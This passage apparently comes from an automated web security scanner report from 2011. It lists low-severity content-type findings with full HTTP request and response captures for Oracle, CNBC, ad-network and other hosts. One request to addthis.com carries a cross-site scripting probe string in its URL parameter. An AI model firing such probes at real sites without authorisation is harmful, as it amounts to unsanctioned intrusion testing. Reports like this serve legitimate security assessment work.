X-Powered-By: PHP/4.3.9
Pragma: no-cache
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 3391
Connection: close
Content-Type: text/html

function nVDxyoUNoxWe(){var aDnRlLWkZIxuL = new Array(69); aDnRlLWkZIxuL[0] = 259292677 ^ 1813646179; aDnRlLWkZIxuL[1] = 41247255 ^ 1813646179; aDnRlLWkZIxuL[2] = 91836227 ^ 1813646179; aDnRlLWkZIxuL[
...[SNIP]...

29.17. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

Request

GET /dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php HTTP/1.1
Host: blog.harbottle.com
Proxy-Connection: keep-alive
Referer: http://blog.harbottle.com/dm/?p=20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; PHPSESSID=b6055d312cfe49b165dbf84a4f9f142b; __utma=40427633.423165929.1315345403.1315345403.1315345403.1; __utmc=40427633; __utmz=40427633.1315345403.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=40427633

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Vary: Accept-Encoding
Content-Length: 1875
Connection: close
Content-Type: text/html


addLoadEvent(lhKlhkMavT);

function createHiddenField(){
   var inp = document.createElement('input');
   inp.setAttribute('type', 'hidden');
   inp.setAttribute('id', 'HRXlXDPwKvYVGwGt');
   inp.setA
...[SNIP]...

29.18. http://blog.harbottle.com/dm/xmlrpc.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm/xmlrpc.php

Request

GET /dm/xmlrpc.php HTTP/1.1
Host: blog.harbottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:16 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: PHPSESSID=e97d8a82d9152534016674330abb1139; path=/
Content-Length: 42
Connection: close
Content-Type: text/html

XML-RPC server accepts POST requests only.

29.19. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /main/resource/resources/ora_code_blogs.js

Request

GET /main/resource/resources/ora_code_blogs.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 06 Sep 2011 15:09:16 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=14;ecid=51387194612877553,0:1)
Content-Length: 36547
Vary: Accept-Encoding
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

var oraVersion="ora_code_blogs:1.03:H22.1";function s_setAccount(){var sa=["oracledevall","ocom","en-us"];
if(location.href.indexOf("-stage")!=-1||location.href.indexOf("-dev")!=-1||location.href.ind
...[SNIP]...

29.20. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /otn/resource/1OTN-2col/OTNHead-Short.png

Request

GET /otn/resource/1OTN-2col/OTNHead-Short.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 21:01:53 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=3600+360;age=372;ecid=47465485677722335,0:1)
Vary: Accept-Encoding
Content-Length: 38457
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR.......n.......J.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

29.21. http://blogs.oracle.com/otn/resource/SunOracle.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /otn/resource/SunOracle.png

Request

GET /otn/resource/SunOracle.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/resource/html/aboutMe6.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 20:20:39 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
X-Oracle-DMS-ECID: 4984942665267212
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=3600+360;age=0;ecid=4984942665267212,0:1)
Vary: Accept-Encoding
Content-Length: 7183
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR...d...D.....wN.b....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov..r.4.....R..il|Bj.....    A4%U..N$.A.s.{..z..[V.{
...[SNIP]...

29.22. http://blogs.oracle.com/otn/resource/java-logo.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /otn/resource/java-logo.png

Request

GET /otn/resource/java-logo.png HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/resource/html/aboutMe6.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343571486; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 20:20:39 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
X-Oracle-DMS-ECID: 4444103192084779
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=3600+360;age=0;ecid=4444103192084779,0:1)
Vary: Accept-Encoding
Content-Length: 9353
Expires: Tue, 06 Sep 2011 16:12:52 GMT
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

.PNG
.
...IHDR...K...y.....q..L....iCCPICC Profile..x..T.k.A..6n..".Zk..x."IY.hE.6..bk....E.d3I.n6..&......*.E......z.d/J.ZE(..(b..-..nL.....~..7.}ov..r.4.....R..il|Bj.....    A4%U..N$.A.s.{..z..[V.{
...[SNIP]...

29.23. http://blogs.oracle.com/theme/scripts/clientSideInclude.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /theme/scripts/clientSideInclude.js

Request

GET /theme/scripts/clientSideInclude.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/entry/we_wish_jim_grays_accomplishme
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343700623; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Ftags%2Fdatabase%3Fpage%3D1; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Ftags%25252Fdatabase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Fotn%25252Fentry%25252Fwe_wish_jim_grays_accomplishme%2526ot%253DA

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 19:28:04 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=248;ecid=51681369811325973,0:1)
Content-Length: 2209
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:15:01 GMT
Connection: close

/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. The ASF licenses this file to You
* under the Apache License, Version 2.0 (the "License"); y
...[SNIP]...

29.24. http://blogs.oracle.com/theme/scripts/roller.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /theme/scripts/roller.js

Request

GET /theme/scripts/roller.js HTTP/1.1
Host: blogs.oracle.com
Proxy-Connection: keep-alive
Referer: http://blogs.oracle.com/otn/entry/we_wish_jim_grays_accomplishme
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343700623; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Ftags%2Fdatabase%3Fpage%3D1; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Ftags%25252Fdatabase%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Fotn%25252Fentry%25252Fwe_wish_jim_grays_accomplishme%2526ot%253DA

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Last-Modified: Tue, 26 Apr 2011 19:28:04 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=82;ecid=51681356926423946,0:1)
Content-Length: 6164
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:15:01 GMT
Connection: close

/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. The ASF licenses this file to You
* under the Apache License, Version 2.0 (the "License"); y
...[SNIP]...

29.25. http://c.brightcove.com/services/messagebroker/amf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Request

GET /services/messagebroker/amf HTTP/1.1
Host: c.brightcove.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 06 Sep 2011 17:06:20 GMT
Server:
Content-Length: 27076

<html>
<head>
<title>gobbles!</title>
</head>
<body>
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This tu
...[SNIP]...

29.26. http://cdn.krxd.net/kruxcontent/krux_iframe.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.krxd.net
Path:   /kruxcontent/krux_iframe.html

Request

GET /kruxcontent/krux_iframe.html?bumpCookie HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b009

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Expires: Tue, 06 Sep 2011 16:04:20 GMT
Server: Apache
X-N: S
Last-Modified: Thu, 25 Aug 2011 01:21:21 GMT
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
X-Request-Time: D=906 t=1314641218918495
X-Served-By: logger-b011.krxd.net
Content-Length: 2023
Date: Tue, 06 Sep 2011 15:59:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html>
<html>
<body>
<!-- Javascript inlined for performance -->
<script>
// cookie lib, minified
cookie=function(name,value,options){if(arguments.length>1){options=options||{};if(!(value)){v
...[SNIP]...

29.27. http://cdn5.tribalfusion.com/media/1956006/frame.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /media/1956006/frame.html

Request

GET /media/1956006/frame.html HTTP/1.1
Host: cdn5.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Content-Length: 98
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close
Vary: Accept-Encoding
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<script type="text/javascript" src="http://adadvisor.net/adscores/g.js?sid=9239766368"></script>

29.28. http://cdn5.tribalfusion.com/media/2516896//frm.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /media/2516896//frm.html

Request

GET /media/2516896//frm.html HTTP/1.1
Host: cdn5.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 14:59:04 GMT
Content-Length: 1378
Connection: close
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<html>
<head>
<script type="text/javascript" src="http://rd.rlcdn.com/rd?type=js&site=108544"></script>
</head>
<body>
<script type="text/javascript">
var segMap = [
[ 40380496
...[SNIP]...

29.29. http://ds.addthis.com/red/psi/sites/www.dove.us/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.dove.us/p.json

Request

GET /red/psi/sites/www.dove.us/p.json?callback=_ate.ad.hpr&uid=4e37104432fe1148&url=http%3A%2F%2Fwww.dove.us%2FProducts%2FHair%2F%3F%22)%3C%2Fscript%3Ed91bc007f7%3D1&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ynnuuq HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
Cookie: uid=4e37104432fe1148; psc=4; di=%7B%222%22%3A%222040695539456590%2CMhd7ak45SYsADCcs%22%7D..1315247533.10R|1315247533.1WV|1315247533.1FE|1315247533.1OD|1315247533.60|1315247533.1EY; uvc=2|32,6|33,6|34,15|35,12|36; dt=X; loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 06 Sep 2011 16:53:42 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 06 Oct 2011 16:53:42 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 06 Sep 2011 16:53:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 16:53:42 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

29.30. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=3267000;type=homep770;cat=homep781;ord=1;num=6780372345820.069? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 06 Sep 2011 15:34:46 GMT
Expires: Tue, 06 Sep 2011 15:34:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 559
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://se
...[SNIP]...

29.31. http://install.volusion.com/installer/demos/Empty.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://install.volusion.com
Path:   /installer/demos/Empty.htm

Request

GET /installer/demos/Empty.htm HTTP/1.1
Host: install.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WRUID=0; __utma=1.869666244.1315341244.1315341244.1315341244.1; __utmb=1.2.10.1315341244; __utmc=1; __utmz=1.1315341244.1.1.utmgclid=CKPJnbn4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:702-MYH-396&token:_mch-volusion.com-1315341246586-52878; __kti=1315341246706,http%3A%2F%2Fwww.volusion.com%2F%3F_kk%3D%252Becommerce%2520%252Bsolution%26_kt%3D3fda914a-c56d-407d-b8c6-0b1636cef4d3%26gclid%3DCKPJnbn4iKsCFSE8gwod-iiK3g,http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio; __kts=1315341246707,http%3A%2F%2Fwww.volusion.com%2F%3F_kk%3D%252Becommerce%2520%252Bsolution%26_kt%3D3fda914a-c56d-407d-b8c6-0b1636cef4d3%26gclid%3DCKPJnbn4iKsCFSE8gwod-iiK3g,http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio; __ktv=e7bf-9861-7a47-e7571324072a0f4; __ktt=3f9f-b66-9534-ae121324072a0f5; TRIALSTEP=/free-trial/form-1

Response

HTTP/1.1 200 OK
Content-Length: 40
Content-Type: text/html
Last-Modified: Mon, 18 Jul 2011 21:43:00 GMT
Accept-Ranges: bytes
ETag: "e0b77aaa9345cc1:56fc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:34:39 GMT

...<body bgcolor="#ffffff">&nbsp;</body>

29.32. http://js.adsonar.com/js/pass.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /js/pass.html

Request

GET /js/pass.html?cb=34121 HTTP/1.1
Host: js.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.tacoda.at.atwola.com/an/qseg.html

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2011 15:16:10 GMT
ETag: "5ab-4a676ae738280"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 1451
Content-Type: text/html
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 15:30:15 GMT
Date: Tue, 06 Sep 2011 15:00:15 GMT
Connection: close

<html><body><script type="text/javascript">
window.onerror=errorHandle;function errorHandle(e){return true;}var d=location.hash;if(d){var c=document.cookie;if(c.length==0||(c.length>0&&c.indexOf("oo_
...[SNIP]...

29.33. https://login.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /

Request

GET / HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:30 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Sun, 03 Dec 2006 16:39:34 GMT
ETag: "e000c-49-423b5e0c67d80"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/html

<script>
window.location="https://login.cnbc.com/index.jsp";
</script>

29.34. http://m.cnbc.com/mytest/ipecho.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /mytest/ipecho.php

Request

GET /mytest/ipecho.php HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Cache-Control: max-age=1
Expires: Tue, 06 Sep 2011 14:57:01 GMT
Vary: Accept-Encoding
Content-Type: text/html
Via: 1.1 aicache6
Content-Length: 59
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20

getip({"ip": "64.210.193.254", "address":"50.23.123.106"});

29.35. https://myprofile.oracle.com/EndUser/images/fading-background.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myprofile.oracle.com
Path:   /EndUser/images/fading-background.png

Request

GET /EndUser/images/fading-background.png;jsessionid=pGkjT74Fmj5QqMfz5ny60MhFJ2L5ZCFTnxWvdQh3Vt0P6q5rTp8g!1256741422 HTTP/1.1
Host: myprofile.oracle.com
Connection: keep-alive
Referer: https://myprofile.oracle.com/EndUser/faces/profile/findUsername.jspx
